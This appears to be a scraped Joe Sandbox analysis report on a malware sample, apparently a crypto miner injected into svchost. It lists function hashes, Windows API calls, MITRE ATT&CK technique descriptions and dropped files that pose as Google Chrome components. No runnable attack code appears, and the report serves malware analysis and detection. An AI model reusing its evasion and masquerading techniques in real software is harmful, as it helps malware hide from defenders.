API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: a249b9969e2805c9129e296e10ec27a6a6e59d05e86a8489335fdeda036b5398
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 5902FB32519B8486EB60CF59E49439AB7A4F3C4B84F11402AFA9E87BA8DF7CC545CF04

Function 0000018F9CD10860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018F9CD108A2
GetConsoleMode.KERNEL32 ref: 0000018F9CD10960
GetLastError.KERNEL32 ref: 0000018F9CD109EA

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 9818fe8330c5c0089c5182e10dc298e877aa15872ae9ba81c86b338f9325fdda
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 9E81B232E1861299F778BB6588903ED66A8B744F8CF84813BFE2A53691DF349643C750

Function 0000018F9CD057F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000018F9CD05806

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 5ef749c3291b0a62d3d0bae550d6b801f133db935e4761a35770445790029c47
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: F061B936919A40C6E774CF19E49439AB7E8F388B48F11812AFA9D47BA4DF78C641CF44

Function 0000018F9CD11EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000018F9CD11EE0
_set_statfp.LIBCMT ref: 0000018F9CD11EFB
_set_statfp.LIBCMT ref: 0000018F9CD11F17
_set_statfp.LIBCMT ref: 0000018F9CD11F53

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 7d1a2b62a8e6521126e04be0d8f6953d7ed372c15db8d34fa39c3cf827a13b86
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 7E113A37E58A1301F6BC1168E45A3F91089AB65B7CE08863EFA7A066D7CF588B434300

Function 0000018F9CD03878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000018F9CD03886
GetCurrentProcess.KERNEL32 ref: 0000018F9CD038B4
VirtualProtectEx.KERNEL32 ref: 0000018F9CD038D6
GetCurrentProcess.KERNEL32 ref: 0000018F9CD038F4
VirtualProtectEx.KERNEL32 ref: 0000018F9CD03915

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 1a7a34cd974ca7f9e2fc7648282fc2fed87789ee98147a8cf2be61f7c108d1bc
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 2A110035B05B4186EB389B55F40439966A8FB48B98F05803AEE9907754EF3DC646CB04

Function 0000018F9CCD84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000018F9CCD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000018F9CCD8598

Strings

f, xrefs: 0000018F9CCD8516
csm, xrefs: 0000018F9CCD857E

Memory Dump Source

Source File: 00000024.00000002.2669208973.0000018F9CCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CCD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9ccd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 0ae7b6d270842f3ab38dab2ffb01e71f551e6c77ea2c2757fcd7acfcd66b2efb
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 5C518132B116808BEB14DF15E844B993B95F344BACF51C138FA46A7788EF34DA4B8784

Function 0000018F9CCD84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000018F9CCD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000018F9CCD8598

Strings

f, xrefs: 0000018F9CCD8516
csm, xrefs: 0000018F9CCD857E

Memory Dump Source

Source File: 00000024.00000002.2669208973.0000018F9CCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CCD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9ccd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: a6ed5875116db7979cd710a7b82c65732a813cb42be5c4b484ef536c2a144ec8
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: B9317C76B2168097E714DF11E884B993BA4F740B9CF15C028FE5AA7785DF38CA46C784

Function 0000018F9CD014B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000018F9CD014D5
HeapFree.KERNEL32 ref: 0000018F9CD014E4
GetProcessHeap.KERNEL32 ref: 0000018F9CD014F0
HeapFree.KERNEL32 ref: 0000018F9CD014FF
GetProcessHeap.KERNEL32 ref: 0000018F9CD0152A

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: e0d6fed4b171bb1fcfd2d46c57682b3dd029a86eccee73bc69064d47d7fcb0d9
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 15111F71A14B8592E778DF6AA44435A7774F789F98F04802FEBAA03765DF38C1528740

Function 0000018F9CD026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000018F9CD027D4
StrCpyW.SHLWAPI ref: 0000018F9CD027ED

Strings

\\.\pipe\, xrefs: 0000018F9CD027DF

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: f98acfefa4d448bff605ee75edb2ae747602b8874a04e5a1051c6e497161ed32
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 6571B636A01B8145E774DE2D99443EAA798F746B88F46803FED6943B4ADF34C7068B40

Function 0000018F9CD024DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000018F9CD025C3
StrCpyW.SHLWAPI ref: 0000018F9CD025DA

Strings

\\.\pipe\, xrefs: 0000018F9CD025CE

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: d66b81616eb007292d7d234c6d7836dd924baf6d723e1c5f57c5bbff0839b26f
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: A451EC32A0578142E634EE2D95543EA6659F786788F56803FFD6903B9BCE35C7038F40

Function 0000018F9CD10604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000018F9CD1071B
GetLastError.KERNEL32 ref: 0000018F9CD1073D

Strings

U, xrefs: 0000018F9CD106C7

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: bac8071df8e953b0c886745736483fb110a8a509bd74c8712d7959014b2e3918
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 7C41A672714A4186EB30EF25E4443D967A4F788B88F91803AEE5D87758DF38D642CB40

Function 0000018F9CD0D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000018F9CD0D6F9
LCMapStringW.KERNEL32 ref: 0000018F9CD0D781

Strings

LCMapStringEx, xrefs: 0000018F9CD0D6DC, 0000018F9CD0D6ED

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 5e6c0ad24d383f0fb4afff16742035667681393198014fd73935231811c3a4e3
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: CE110836A08B8086DB74CB16B44039AB7A8F7C9B94F54812BFE9D83B59DF38C5518B00

Function 0000018F9CD094A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000018F9CD094E8
RaiseException.KERNEL32 ref: 0000018F9CD0952E

Strings

csm, xrefs: 0000018F9CD0951B

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: ce12d6a892c2d89d7b710758bc6a1540b9dccf72d5f067104a89f4995b8e8181
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 78111F32614B8082EB758F15E44439977A5F788B98F198229EF9D07768DF38C656CB00

Function 0000018F9CD0D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000018F9CD0D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000018F9CD0D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000018F9CD0D681

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: d50392d7a49d72c2d07f009004cd68a4b86fc25ea44a32bcb48ac21b50da8d40
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: F9F05E31B1078191FA399B59F4407D56629AB88F98F49D03BF96903B54CF78CA96CB10

Function 0000018F9CD0D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000018F9CD0D631
TlsSetValue.KERNEL32 ref: 0000018F9CD0D648

Strings

FlsSetValue, xrefs: 0000018F9CD0D61E

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: bbfa67e3a081bb83571d419aa158616f3a662d491a34130c0e8c9e77ddb0c55d
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 77E06D71A1064291FA389B65F8017D5222ABB88B88F89D03FF92906295CF38CA57CB10

Function 0000018F9CD01D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000018F9CD01D9B
HeapAlloc.KERNEL32 ref: 0000018F9CD01DAA
GetProcessHeap.KERNEL32 ref: 0000018F9CD01E1E
HeapFree.KERNEL32 ref: 0000018F9CD01E2C

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: f271e0bab906f3a8a4c72353acc8ead638f6062e827dc58d140b3f0ae9333232
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: C5218672A04B8081EB35CF59A40439AF7A4FB89B98F15812AEE9C47B14EE78C6538700

Function 0000018F9CD01274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000018F9CD0127A
HeapAlloc.KERNEL32 ref: 0000018F9CD01289
GetProcessHeap.KERNEL32 ref: 0000018F9CD012A3
HeapAlloc.KERNEL32 ref: 0000018F9CD012B4

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 8db052684801756df963748defa85bc802d54961a0d5b8d44b998c846b469fdb
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: FFE06DF1A1160186E7288F62D8043893AE5FF8CF25F48C02ACD1907350DF7D85DAC740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zufmUwylvo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zufmUwylvo.exe_f86f6f72c3e73a99d55943cbbe3ae9759d54_728e4a88_3b0a3bc7-4744-421c-963f-2bcded8cd5a0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1505.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1544.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4D.tmp.dmp

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

